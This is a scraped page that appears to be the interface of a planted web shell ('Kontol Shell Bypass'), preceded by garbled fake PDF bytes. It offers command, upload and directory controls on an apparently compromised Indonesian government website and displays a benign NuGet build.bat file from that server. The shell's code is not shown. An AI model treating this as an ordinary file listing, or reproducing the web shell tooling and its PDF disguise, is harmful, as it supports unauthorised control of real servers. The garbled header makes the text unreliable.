%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /www/wwwroot/jdih.dprd.mukomukokab.go.id/backend/assets/98d0ac94/nuget/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /www/wwwroot/jdih.dprd.mukomukokab.go.id/backend/assets/98d0ac94/nuget/build.bat
@echo off

NuGet Update -self
REM remove package content folder
echo Deleting existing content directory if available.
if exist content (
    rmdir /s /q content
    echo Content directory deleted.
) else (
    echo Content directory not found.
)

echo Creating content directory.

REM create new package content folder
mkdir content

REM create sub folder for js files
mkdir content\Scripts

REM create sub folders for css and img files
mkdir content\Content
mkdir content\Content\bootstrap-fileinput

REM delete the previous package versions
REM del bootstrap-fileinput.*

REM copy the content to the destination folders
xcopy ..\js content\Scripts /D /E /C /R /I /K /Y 
xcopy ..\css content\Content\bootstrap-fileinput\css /D /E /C /R /I /K /Y 
xcopy ..\img content\Content\bootstrap-fileinput\img /D /E /C /R /I /K /Y 
xcopy ..\themes content\Content\bootstrap-fileinput\themes /D /E /C /R /I /K /Y 
xcopy ..\scss content\Content\bootstrap-fileinput\scss /D /E /C /R /I /K /Y 

REM create a new package
NuGet Pack Package.nuspec -Exclude NuGet.exe;build.bat

REM Upload the new package
REM for %%f in (content\Content\bootstrap-fileinput.*) do (
REM NuGet Push %%f
REM rmdir /s /q content
REM del %%f
REM )

Kontol Shell Bypass